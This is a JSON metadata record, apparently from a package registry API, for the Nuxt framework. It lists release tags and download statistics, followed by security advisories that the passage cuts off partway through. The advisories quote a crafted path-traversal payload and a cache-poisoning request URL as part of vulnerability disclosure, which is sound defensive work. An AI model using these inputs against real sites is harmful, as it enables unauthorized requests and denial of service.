":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-09-08T14:59:12.216Z","dependent_packages_count":3031,"downloads":5630382,"downloads_period":"last-month","dependent_repos_count":70778,"rankings":{"downloads":0.17118208716549266,"dependent_repos_count":0.11474750782318399,"dependent_packages_count":0.026885624237095878,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":0.4433464668252704,"average":0.2391929491487289},"purl":"pkg:npm/nuxt","advisories":[{"uuid":"GSA_kwCzR0hTQS1wNmpxLTh2YzQtNzlmNs4ABMUE","url":"https://github.com/advisories/GHSA-p6jq-8vc4-79f6","title":"Nuxt has Client-Side Path Traversal in Nuxt Island Payload Revival","description":"### Summary\n\nA client-side path traversal vulnerability in Nuxt's Island payload revival mechanism allowed attackers to manipulate client-side requests to different endpoints within the same application domain when specific prerendering conditions are met.\n\n### Technical Details\n\nThe vulnerability occurs in the client-side payload revival process (revive-payload.client.ts) where Nuxt Islands are automatically fetched when encountering serialized `__nuxt_island` objects. The issue affects the following flow:\n\n1. During prerendering, if an API endpoint returns user-controlled data containing a crafted `__nuxt_island` object\n2. This data gets serialized with `devalue.stringify` and stored in the prerendered page\n3. When a client navigates to the prerendered page, `devalue.parse` deserializes the payload\n4. The Island reviver attempts to fetch `/__nuxt_island/${key}.json` where `key` could contain path traversal sequences\n\n### Prerequisites for Exploitation\n\nThis vulnerability requires **all** of the following conditions:\n\n1. **Prerendered pages**: The application must use Nuxt's prerendering feature (`nitro.prerender`)\n2. **Attacker-controlled API responses**: The attacker must be able to control the response content of an API endpoint that is called during prerendering via `useFetch`, `useAsyncData`, or similar composables\n3. **Client-side navigation**: A user must navigate to the prerendered page (not during initial SSR hydration)\n\n### Attack Scenario\n\n```javascript\n// Malicious API response during prerendering\n{\n  \"__nuxt_island\": {\n    \"key\": \"../../../../internal/service\",\n    \"params\": { \"action\": \"probe\" }\n  }\n}\n```\n\nThis could cause the client to make requests to `/__nuxt_island/../../../../internal/service.json` if path traversal is not properly handled by the server.\n\n### Impact Assessment\n\n- **Limited Impact**: The vulnerability has a low severity due to the highly specific prerequisites\n- **No Direct Data Exfiltration**: The vulnerability does not directly expose sensitive data\n- **Client-Side Only**: Requests originate from the client, not the server\n\n### Mitigation\n\n**Action Required:**\n- Update to Nuxt 3.19.0+ or 4.1.0+ immediately\n- Review any prerendered pages that fetch external or user-controlled data\n\n**Temporary Workarounds** (if immediate update is not possible):\n1. Disable prerendering for pages that fetch user-controlled data\n2. Implement strict input validation on API endpoints used during prerendering\n3. Use allowlists for API response structures during prerendering\n\n### Fix Details\n\n[The fix](https://github.com/nuxt/nuxt/commit/2566d2046bccb158d98fb13e42ce4b2c33fb2595) implemented validation for Island keys in `revive-payload.server.ts`:\n- Island keys must match the pattern `/^[a-z][a-z\\d-]*_[a-z\\d]+$/i`\n- Maximum length of 100 characters\n- Prevents path traversal and special characters","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-09-17T20:42:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-p6jq-8vc4-79f6","https://github.com/nuxt/nuxt/commit/2566d2046bccb158d98fb13e42ce4b2c33fb2595","https://nvd.nist.gov/vuln/detail/CVE-2025-59414","https://github.com/advisories/GHSA-p6jq-8vc4-79f6"],"source_kind":"github","identifiers":["GHSA-p6jq-8vc4-79f6","CVE-2025-59414"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":0.0,"created_at":"2025-09-17T21:09:29.189Z","updated_at":"2026-05-12T01:02:34.464Z","epss_percentage":0.0005,"epss_percentile":0.1536,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNmpxLTh2YzQtNzlmNs4ABMUE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wNmpxLTh2YzQtNzlmNs4ABMUE","packages":[{"ecosystem":"npm","package_name":"nuxt","versions":[{"first_patched_version":"4.1.0","vulnerable_version_range":"\u003e= 4.0.0, \u003c 4.1.0"},{"first_patched_version":"3.19.0","vulnerable_version_range":"\u003e= 3.6.0, \u003c 3.19.0"}],"purl":"pkg:npm/nuxt","statistics":{"dependent_packages_count":3031,"dependent_repos_count":70778,"downloads":5922625,"downloads_period":"last-month"},"affected_versions":["3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.8.0","3.8.1","3.8.2","3.9.0","3.9.1","3.9.2","3.9.3","3.10.0","3.10.1","3.10.2","3.10.3","3.11.0","3.11.1","3.11.2","3.12.0","3.12.1","3.12.2","3.12.3","3.12.4","3.13.0","3.13.1","3.13.2","3.14.0","3.14.159","3.14.1592","3.15.0","3.15.1","3.15.2","3.15.3","3.15.4","3.16.0","3.16.1","3.16.2","3.17.0","3.17.1","3.17.2","3.17.3","3.17.4","3.17.5","3.17.6","3.17.7","3.18.0","3.18.1","4.0.0","4.0.1","4.0.2","4.0.3"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.4.0","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.7","0.4.8","0.5.1","0.5.2","0.5.3","0.6.1","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.8","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","0.10.0","0.10.1","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","1.0.0","1.1.0","1.1.1","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.4.2","1.4.4","1.4.5","2.0.0","2.1.0","2.2.0","2.3.0","2.3.1","2.3.2","2.3.3","2.3.4","2.4.0","2.4.1","2.4.2","2.4.3","2.4.5","2.5.0","2.5.1","2.6.0","2.6.1","2.6.2","2.6.3","2.7.0","2.7.1","2.8.0","2.8.1","2.9.0","2.9.1","2.9.2","2.10.0","2.10.1","2.10.2","2.11.0","2.12.0","2.12.1","2.12.2","2.13.0","2.13.1","2.13.2","2.13.3","2.14.0","2.14.1","2.14.2","2.14.3","2.14.4","2.14.5","2.14.6","2.14.7","2.14.8","2.14.9","2.14.10","2.14.11","2.14.12","2.15.0","2.15.1","2.15.2","2.15.3","2.15.4","2.15.5","2.15.6","2.15.7","2.15.8","2.16.0","2.16.1","2.16.2","2.16.3","2.17.0","2.17.1","2.17.2","2.17.3","2.17.4","2.18.0","2.18.1","3.0.0","3.1.0","3.1.1","3.1.2","3.2.0","3.2.1","3.2.2","3.2.3","3.3.0","3.3.1","3.3.2","3.3.3","3.4.0","3.4.1","3.4.2","3.4.3","3.5.0","3.5.1","3.5.2","3.5.3","3.19.0","3.19.1","3.19.2","3.19.3","3.20.0","3.20.1","3.20.2","3.21.0","3.21.1","3.21.2","3.21.4","3.21.5","4.1.0","4.1.1","4.1.2","4.1.3","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.4.2","4.4.4","4.4.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNmpxLTh2YzQtNzlmNs4ABMUE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qdmhtLWdqcmgtM2g5M84ABFp1","url":"https://github.com/advisories/GHSA-jvhm-gjrh-3h93","title":"Nuxt allows DOS via cache poisoning with payload rendering response","description":"### Summary\n\nBy sending a crafted HTTP request to a server behind an CDN, it is possible in some circumstances to poison the CDN cache and highly impacts the availability of a site.\n\nIt is possible to craft a request, such as `https://mysite.com/?/_payload.json` which will be rendered as JSON. If the CDN in front of a Nuxt site ignores the query string when determining whether to cache a route, then this JSON response could be served to future visitors to the site.\n\n### Impact\n\nAn attacker can perform this attack to a vulnerable site in order to make a site unavailable indefinitely. It is also possible in the case where the cache will be reset to make a small script to send a request each X seconds (=caching duration) so that the cache is permanently poisoned making the site completely unavailable.\n\n\n## Conclusion : \n\nThis is similar to a vulnerability in Next.js that resulted in CVE-2024-46982 (and see [this article](https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir), in particular the \"Internal URL parameter and pageProps\" part, the latter being very similar to the one concerning us here.)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-03-19T19:54:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-jvhm-gjrh-3h93","https://nvd.nist.gov/vuln/detail/CVE-2025-27415","https://github.com/advisories/GHSA-jvhm-gjrh-3h93"],"source_kind":"github","identifiers":["GHSA-jvhm-gjrh-3h93","CVE-2025-27415"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":0.0,"created_at":"2025-03-19T20:08:10.023Z","updated_at":"2026-05-12T01:03:28.271Z","epss_percentage":0.00262,"epss_percentile":0.49487,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdmhtLWdqcmgtM2g5M84ABFp1","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qdmhtLWdqcmgtM2g5M84ABFp1","packages":[{"ecosystem":"npm","package_name":"nuxt","versions":[{"first_patched_version":"3.16.0","vulnerable_version_range":"\u003e= 3.0.0, \u003c 3.16.0"}],"purl":"pkg:npm/nuxt","statistics":{"dependent_packages_count":3031,"dependent_repos_count":70778,"downloads":5922625,"downloads_period":"last-month"},"affected_versions":["3.0.0","3.1.0","3.1.1","3.1.2","3.2.0","3.2.1","3.2.2","3.2.3","3.3.0","3.3.1","3.3.2","3.3.3","3.4.0","3.4.1","3.4.2","3.4.3","3.5.0","3.5.1","3.5.2","3.5.3","3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.8.0","3.8.1","3.8.2","3.9.0","3.9.1","3.9.2","3.9.3","3.10.0","3.10.1","3.10.2","3.10.3","3.11.0","3.11.1","3.11.2","3.12.0","3.12.1","3.12.2","3.12.3","3.12.4","3.13.0","3.13.1","3.13.2","3.14.0","3.14.159","3.14.1592","3.15.0","3.15.1","3.15.2","3.15.3","3.15.4"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.3.5","0.3.6","0.3.7","0.4.0","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.7","0.4.8","0.5.1","0.5.2","0.5.3","0.6.1","0.6.5","0.6.6","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.7.8","0.7.9","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.8","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","0.10.0","0.10.1","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","1.0.0","1.1.0","1.1.1","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.4.2","1.4.4","1.4.5","2.0.0","2.1.0","2.2.0","2.3.0","2.3.1","2.3.2","2.3.3","2.3.4","2.4.0","2.4.1","2.4.2","2.4.3","2.4.5","2.5.0","2.5.1","2.6.0","2.6.1","2.6.2","2.6.3","2.7.0","2.7.1","2.8.0","2.8.1","2.9.0","2.9.1","2.9.2","2.10.0","2.10.1","2.10.2","2.11.0","2.12.0","2.12.1","2.12.2","2.13.0","2.13.1","2.13.2","2.13.3","2.14.0","2.14.1","2.14.2","2.14.3","2.14.4","2.14.5","2.14.6","2.14.7","2.14.8","2.14.9","2.14.10","2.14.11","2.14.12","2.15.0","2.15.1","2.15.2","2.15.3","2.15.4","2.15.5","2.15.6","2.15.7","2.15.8","2.16.0","2.16.1","2.16.2","2.16.3","2.17.0","2.17.1","2.17.2","2.17.3","2.17.4","2.18.0","2.18.1","3.16.0","3.16.1","3.16.2","3.17.0","3.17.1","3.17.2","3.17.3","3.17.4","3.17.5","3.17.6","3.17.7","3.18.0","3.18.1","3.19.0","3.19.1","3.19.2","3.19.3","3.20.0","3.20.1","3.20.2","3.21.0","3.21.1","3.21.2","3.21.4","3.21.5","4.0.0","4.0.1","4.0.2","4.0.3","4.1.0","4.1.1","4.1.2","4.1.3","4.2.0","4.2.1","4.2.2","4.3.0","4.3.1","4.4.2","4.4.4","4.4.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdmhtLWdqcmgtM2g5M84ABFp1/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12Nzg0LWZqamgtZjhyNM4AA-Ye","url":"https://github.com/advisories/GHSA-v784-fjjh-f8r4","title":"Nuxt vulnerable to remote code execution via the browser when running the test locally","description":"### Summary\nDue to the insufficient validation of the `path` parameter in the NuxtTestComponentWrapper, an attacker can execute arbitrary JavaScript on the server side, which allows them to execute arbitrary commands.\n\n### Details\nWhile running the test, a special component named `NuxtTestComponentWrapper` is available.\nhttps://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/nuxt-root.vue#L42-L43\n\nThis component loads the specified path as a component and renders it.\n\nhttps://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L9-L27\n\nThere is a validation for the `path` parameter to check whether the path traversal is performed, but this check is not 